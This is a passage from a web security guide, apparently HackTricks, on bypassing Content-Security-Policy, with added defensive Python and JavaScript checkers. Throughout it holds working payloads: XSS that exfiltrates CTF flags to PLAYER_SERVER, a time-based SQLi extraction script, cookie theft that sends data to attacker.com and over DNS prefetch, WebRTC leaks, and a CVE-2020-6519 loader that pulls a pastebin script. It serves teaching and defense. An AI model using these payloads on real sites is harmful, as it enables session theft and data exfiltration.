The CSP allows the path https://www.google.com/a/b/c/d. Therefore, the /test and /a/test scripts are blocked by the CSP.
However, the final http://localhost:5555/301 is redirected server-side to https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//. Since it is a redirect, the path is not considered and the script can be loaded, bypassing the path restriction.
With this redirection, even a fully specified path is bypassed.
Therefore, the best solution is to ensure the website has no open redirect vulnerabilities and that the domains in the CSP rules cannot be exploited.
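To make the redirect rule concrete, here is an added Python model of CSP host-source matching (not code from HackTricks or from any browser) run against the policy of the example above. The matcher is simplified (no '*' wildcards, scheme-less sources accept any scheme); what it reproduces is the rule that the path part of a source is checked for the first request only and ignored for every hop after a redirect, which is why the open redirect on the whitelisted localhost origin reaches a path on www.google.com that the policy never allowed directly.

```python
from urllib.parse import urlsplit

# Policy from the <meta> tag in the example above.
POLICY = "script-src http://localhost:5555 https://www.google.com/a/b/c/d"


def script_src_sources(policy: str) -> list:
    """Return the host sources of the script-src directive (keyword sources skipped)."""
    for part in policy.split(";"):
        tokens = part.split()
        if tokens and tokens[0].lower() == "script-src":
            return [t for t in tokens[1:] if not t.startswith("'")]
    return []


def host_source_allows(source: str, url: str, redirected: bool) -> bool:
    """Match one CSP host-source against a URL (simplified: no '*' wildcards,
    scheme-less sources accept any scheme). After a redirect the path part of
    the source is ignored, which is the behaviour the section above relies on."""
    if "://" not in source:
        source = "//" + source
    s, u = urlsplit(source), urlsplit(url)
    if s.scheme and s.scheme != u.scheme:
        return False
    if s.hostname != u.hostname or s.port != u.port:
        return False
    if redirected or s.path in ("", "/"):
        return True
    if s.path.endswith("/"):          # directory source: prefix match
        return u.path.startswith(s.path)
    return u.path == s.path           # file source: exact match


def script_allowed(policy: str, url: str, redirected: bool = False) -> bool:
    return any(host_source_allows(src, url, redirected) for src in script_src_sources(policy))


def redirect_chain_allowed(policy: str, chain: list) -> bool:
    """A script fetch succeeds only if every hop passes: the first request is
    path-checked, every later hop is checked on scheme, host and port only."""
    return all(script_allowed(policy, hop, redirected=i > 0) for i, hop in enumerate(chain))


if __name__ == "__main__":
    jsonp = "https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//"
    print(script_allowed(POLICY, "https://www.google.com/test"))                   # False
    print(script_allowed(POLICY, jsonp))                                            # False: direct load, path checked
    print(redirect_chain_allowed(POLICY, ["http://localhost:5555/301", jsonp]))    # True: path ignored after redirect
```

The practical reading for a defender: every host in script-src is trusted as a whole once any redirect is involved, so an open redirect on one whitelisted origin plus a JSONP endpoint anywhere on another whitelisted host is enough, regardless of how narrow the paths look.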
Bypass CSP with dangling markup
Read how here.
'unsafe-inline'; img-src *; via XSS
default-src 'self' 'unsafe-inline'; img-src *;
'unsafe-inline'
'unsafe-inline' means you can execute any script inside the page (XSS can execute code), and img-src * means you can load any image from any source in the webpage.
You can bypass this CSP by exfiltrating the data via images (in this case the XSS abuses a CSRF where a page accessible by the bot contains an SQLi, and the flag is extracted via an image):
<script>fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_)</script>
From: https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle
You could also abuse this configuration to load JavaScript code inserted inside an image. If, for example, the page allows loading images from Twitter, you could craft a special image, upload it to Twitter and abuse the "unsafe-inline" to execute JS code (as a regular XSS) that will load the image, extract the JS from it and execute it: https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/
With Service Workers
The Service Worker function importScripts isn't limited by CSP:
{% content-ref url="../xss-cross-site-scripting/abusing-service-workers.md" %} abusing-service-workers.md {% endcontent-ref %}
Policy Injection
Research: https://portswigger.net/research/bypassing-csp-with-policy-injection
Chrome
If a parameter sent by you is being pasted inside the declaration of the policy, then you could alter the policy in some way that makes it useless. You could allow script 'unsafe-inline' with any of these bypasses:
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
Edge
In Edge it is simpler: if you can inject just ;_ into the CSP, Edge drops the whole policy, so no script-src directive is enforced.
Example: http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E
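As an added example for the Chrome case (not code from HackTricks or from the PortSwigger research), the Python below models a server that builds its policy from a template with a request-controlled value, and shows why the injected value has to introduce script-src-elem/script-src-attr rather than a second script-src: browsers keep the first occurrence of a directive name and ignore duplicates, but the element/attribute directives take precedence over script-src for what they govern. The template, the nonce value and the _SAFE_TOKEN allow-list are assumptions for the demo; accept_policy_value is the check that keeps untrusted input from ever changing the directive set.

```python
import re

# Assumption: values placed into the policy may only contain these characters.
# ';' and whitespace are what let an injected value start a new directive.
_SAFE_TOKEN = re.compile(r"^[A-Za-z0-9./_-]+$")


def parse_csp(policy: str) -> dict:
    """Split a policy into {directive: values}. Like browsers, keep the FIRST
    occurrence of a directive name and ignore later duplicates."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def build_policy_unsafe(report_path: str) -> str:
    """Template that pastes a request-controlled value straight into the header (the bug)."""
    return f"script-src 'nonce-r4nd0m'; object-src 'none'; report-uri /report/{report_path}"


def accept_policy_value(value: str) -> bool:
    """True only for values that cannot terminate or extend a directive."""
    return bool(_SAFE_TOKEN.match(value))


def build_policy_safe(report_path: str) -> str:
    """Same template, but refuses values that could smuggle in a new directive."""
    if not accept_policy_value(report_path):
        raise ValueError("untrusted value rejected from CSP header")
    return build_policy_unsafe(report_path)


def injected_directives(builder, value: str) -> list:
    """Directive names that exist only because of `value`."""
    baseline = set(parse_csp(builder("x")))
    return sorted(set(parse_csp(builder(value))) - baseline)


if __name__ == "__main__":
    # The injected string from the Chrome bypass list above.
    elem_attr = "x; script-src-elem *; script-src-attr *"
    print(injected_directives(build_policy_unsafe, elem_attr))   # ['script-src-attr', 'script-src-elem']
    print(injected_directives(build_policy_unsafe, "x; script-src *"))  # []: duplicate script-src is ignored
    print(accept_policy_value(elem_attr))                          # False: the safe builder refuses it
```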
img-src *; via XSS (iframe) - Time attack
Notice the lack of the 'unsafe-inline' directive.
This time you can make the victim load a page under your control via XSS with an <iframe>. This time you make the victim access the page from which you want to extract information (CSRF). You cannot access the content of the page, but if you can somehow control the time the page needs to load, you can extract the information you need.
This time a flag is extracted: whenever a char is correctly guessed via SQLi, the response takes longer due to the sleep function. Then you can extract the flag:
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name=f id=g></iframe> <!-- The bot will load a URL with the payload -->
<script>
let host = "http://x-oracle-v1.nn9ed.ka0labs.org";
function gen(x) {
x = escape(x.replace(/_/g, '\\_'));
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23`;
}
function gen2(x) {
x = escape(x);
return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23`;
}
async function query(word, end=false) {
let h = performance.now();
f.location = (end ? gen2(word) : gen(word));
await new Promise(r => {
g.onload = r;
});
let diff = performance.now() - h;
return diff > 300;
}
let alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789'.split('');
let postfix = '}'
async function run() {
let prefix = 'nn9ed{';
while (true) {
let i = 0;
for (i;i<alphabet.length;i++) {
let c = alphabet[i];
let t = await query(prefix+c); // Check what chars returns TRUE or FALSE
console.log(prefix, c, t);
if (t) {
console.log('FOUND!')
prefix += c;
break;
}
}
if (i==alphabet.length) {
console.log('missing chars');
break;
}
let t = await query(prefix+'}', true);
if (t) {
prefix += '}';
break;
}
}
new Image().src = 'http://PLAYER_SERVER/?' + prefix; //Exfiltrate the flag
console.log(prefix);
}
run();
</script>
Via Bookmarklets
This attack requires some social engineering: the attacker convinces the user to drag and drop a link onto the browser's bookmarks bar (or to click it). The bookmarklet contains malicious JavaScript that, when dropped or clicked, is executed in the context of the current web window, bypassing CSP and allowing the theft of sensitive information such as cookies or tokens.
<iframe src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]" csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
In this CTF writeup, an HTML injection was used to make the CSP more restrictive so that a protective script was disabled and the vulnerability became exploitable.
A CSP can be made more restrictive with HTML meta tags, and inline scripts can be disabled by removing the entry allowing their nonce and enabling only specific inline scripts via sha hashes:
<meta http-equiv="Content-Security-Policy" content="script-src 'self'
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';">
JS exfiltration with Content-Security-Policy-Report-Only
If you can make the server respond with a Content-Security-Policy-Report-Only header whose value you control, you can exfiltrate JS content by wrapping it in <script> tags. Since unsafe-inline is likely not allowed by the CSP, this triggers a CSP violation report that sends the sensitive content to the report endpoint set in Content-Security-Policy-Report-Only.
For an example check this CTF writeup.
CVE-2020-6519
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
Leaking Information with CSP and Iframe
An iframe is created that points to a URL (let's call it https://example.redirect.com) which is permitted by the CSP. This URL then redirects to a secret URL (e.g., https://usersecret.example2.com) that is not allowed by the CSP.
By listening for the securitypolicyviolation event, one can capture the blockedURI property. This property reveals the domain of the blocked URI, leaking the secret domain that the initial URL redirected to.
Note that browsers like Chrome and Firefox behave differently when handling iframes with respect to CSP, which can leak sensitive information due to undefined behavior.
Another technique uses the CSP itself to deduce the secret subdomain, adjusting the policy to allow only specific candidate domains:
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
By monitoring which requests are blocked or allowed by the CSP, one can narrow down the possible characters in the secret subdomain, eventually uncovering the full URL.
Both methods exploit the nuances of CSP implementation and behavior in browsers, demonstrating how seemingly secure policies can inadvertently leak sensitive information.
Trick from here.
Unsafe Technologies to Bypass CSP
PHP response buffer overload
PHP is known for buffering the response to 4096 bytes by default. Therefore, if PHP is showing a warning, by providing enough data inside warnings, the response will be sent before the CSP header, causing the header to be ignored.
The technique therefore basically consists of filling the response buffer with warnings so the CSP header isn't sent.
Idea from this writeup.
Rewrite Error Page
From this writeup it looks like it was possible to bypass a CSP protection by loading an error page (potentially without CSP) and rewriting its content.
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);
SOME + 'self' + wordpress
SOME is a technique that abuses an XSS (or a very limited XSS) in an endpoint of a page to abuse other endpoints of the same origin. This is done by loading the vulnerable endpoint from an attacker page and then refreshing the attacker page to the real endpoint in the same origin you want to abuse. This way the vulnerable endpoint can use the opener object in the payload to access the DOM of the real endpoint. For more information check:
{% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %} some-same-origin-method-execution.md {% endcontent-ref %}
Moreover, WordPress has a JSONP endpoint in /wp-json/wp/v2/users/1?_jsonp=data that will reflect the data sent in the output (with the limitation of only letters, numbers and dots).
An attacker can abuse that endpoint to generate a SOME attack against WordPress and embed it inside <script src=/wp-json/wp/v2/users/1?_jsonp=some_attack></script>. Note that this script will be loaded because it's allowed by 'self'. Moreover, because WordPress is installed, an attacker might abuse the SOME attack through the vulnerable callback endpoint that bypasses the CSP to give more privileges to a user, install a new plugin...
For more information about how to perform this attack check https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/
CSP Exfiltration Bypasses
If there is a strict CSP that doesn't allow you to interact with external servers, there are some things you can always do to exfiltrate the information.
Location
You could just update the location to send to the attacker's server the secret information:
var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid;
Meta tag
You could also redirect by injecting a meta tag (this is just a redirect, it won't leak content):
<meta http-equiv="refresh" content="1; http://attacker.com">
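As an added defender-side check (not code from HackTricks), the Python scanner below runs over a constructed HTML sample and flags the markup primitives this page describes that a CSP does not cover: the meta refresh redirect above, dns-prefetch links, an injected <base> tag and iframes carrying their own csp attribute. header_gaps then checks the response headers for the two server-side mitigations that close those channels (a base-uri directive and X-DNS-Prefetch-Control: off). The hostnames in the sample are placeholders; a JavaScript location change cannot be found this way and is not covered.

```python
from html.parser import HTMLParser


class ExfilPrimitiveScanner(HTMLParser):
    """Collects markup that can trigger a request or navigation CSP does not
    cover: meta refresh, dns-prefetch links, <base> injection and iframes
    carrying their own csp attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag == "link" and "dns-prefetch" in a.get("rel", "").lower().split():
            self.findings.append(("dns-prefetch", a.get("href", "")))
        elif tag == "base" and "href" in a:
            self.findings.append(("base-href", a["href"]))
        elif tag == "iframe" and "csp" in a:
            self.findings.append(("iframe-csp", a["csp"]))


def scan_html(html: str) -> list:
    scanner = ExfilPrimitiveScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def header_gaps(headers: dict) -> list:
    """Response-header checks that close the same channels server-side."""
    gaps = []
    csp = headers.get("Content-Security-Policy", "")
    names = {part.split()[0].lower() for part in csp.split(";") if part.split()}
    if "base-uri" not in names:
        gaps.append("CSP has no base-uri directive (base tag injection possible)")
    if headers.get("X-DNS-Prefetch-Control", "").lower() != "off":
        gaps.append("X-DNS-Prefetch-Control: off not set (dns-prefetch exfiltration possible)")
    return gaps


# Constructed sample: a page where user-controlled HTML ended up in <head> and <body>.
SAMPLE_HTML = """<html><head>
<base href="https://attacker.example/">
<link rel="dns-prefetch" href="//leak.attacker.example">
<meta http-equiv="refresh" content="1; http://attacker.example">
</head><body>
<img src="/logo.png">
<iframe src="/view/1" csp="script-src 'none'"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, value in scan_html(SAMPLE_HTML):
        print(f"{kind}: {value}")
    print(header_gaps({"Content-Security-Policy": "default-src 'self'"}))
```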
DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for later usage.
You can indicate a browser to pre-resolve a hostname with: <link rel="dns-prefetch" href="something.com">
You could abuse this behaviour to exfiltrate sensitive information via DNS requests:
var sessionid = document.cookie.split('=')[1]+".";
var body = document.getElementsByTagName('body')[0];
body.innerHTML = body.innerHTML + "<link rel=\"dns-prefetch\" href=\"//" + sessionid + "attacker.ch\">";
Another way:
const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);
The server can disable this behaviour with the HTTP header:
X-DNS-Prefetch-Control: off
WebRTC
WebRTC traffic is not restricted by the CSP connect-src directive, so a DNS request for the hostname given as an ICE server can still be leaked:
(async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
Another option:
var pc = new RTCPeerConnection({
  "iceServers":[
    {"urls":[
      "turn:74.125.140.127:19305?transport=udp"
    ],"username":"_all_your_data_belongs_to_us",
    "credential":"."
  }]
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));
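As an added example (not code from the HackTricks page), the following audits a server's response headers for the channels covered in this section: dns-prefetch links, WebRTC ICE servers, and session cookies read through document.cookie. Header names and values are constructed samples, and the `webrtc 'block'` directive referenced is the CSP Level 3 one, whose browser support varies.

```javascript
// Added example (not from the original page). Header values are constructed samples.
// Parse "default-src 'self'; img-src 'self' cdn.example" into a directive map.
function parseCsp(value) {
  const directives = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources.map(s => s.toLowerCase());
  }
  return directives;
}

// Fetch directives inherit from default-src when not set explicitly.
function effectiveSources(csp, directive) {
  return csp[directive] || csp['default-src'] || [];
}

// True when every source is 'self' or 'none', i.e. the "strict CSP" case above.
function isSelfOnly(sources) {
  return sources.length > 0 && sources.every(s => s === "'self'" || s === "'none'");
}

// headers: object keyed by lower-case header name; set-cookie may be an array.
function auditExfilChannels(headers) {
  const findings = [];
  const cspHeader = headers['content-security-policy'];
  if (!cspHeader) {
    findings.push({ channel: 'csp', note: 'no Content-Security-Policy header' });
    return findings;
  }
  const csp = parseCsp(cspHeader);

  // 1. <link rel="dns-prefetch"> resolves the hostname regardless of connect-src.
  const prefetch = (headers['x-dns-prefetch-control'] || '').trim().toLowerCase();
  if (prefetch !== 'off') {
    findings.push({ channel: 'dns-prefetch',
      note: 'X-DNS-Prefetch-Control is not "off"; injected dns-prefetch links still resolve' });
  }

  // 2. RTCPeerConnection ICE traffic is not covered by connect-src. CSP3 defines a
  //    separate "webrtc 'block'" directive (browser support varies).
  const webrtcBlocked = (csp['webrtc'] || []).includes("'block'");
  if (isSelfOnly(effectiveSources(csp, 'connect-src')) && !webrtcBlocked) {
    findings.push({ channel: 'webrtc',
      note: "connect-src 'self' does not apply to STUN/TURN hostnames; add webrtc 'block'" });
  }

  // 3. The snippets above read document.cookie; HttpOnly keeps the session id out of
  //    script reach even when the page is scripted.
  const cookies = [].concat(headers['set-cookie'] || []);
  for (const c of cookies) {
    if (!/;\s*httponly/i.test(c)) {
      findings.push({ channel: 'cookie',
        note: `cookie "${c.split('=')[0]}" lacks HttpOnly and is readable via document.cookie` });
    }
  }
  return findings;
}
```

Run it against the headers of a page that believes its CSP is strict; a clean result means the three channels described here are closed at the header level, not that the page is free of injection.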
Checking CSP Policies Online
Automatically creating CSP
https://csper.io/docs/generating-content-security-policy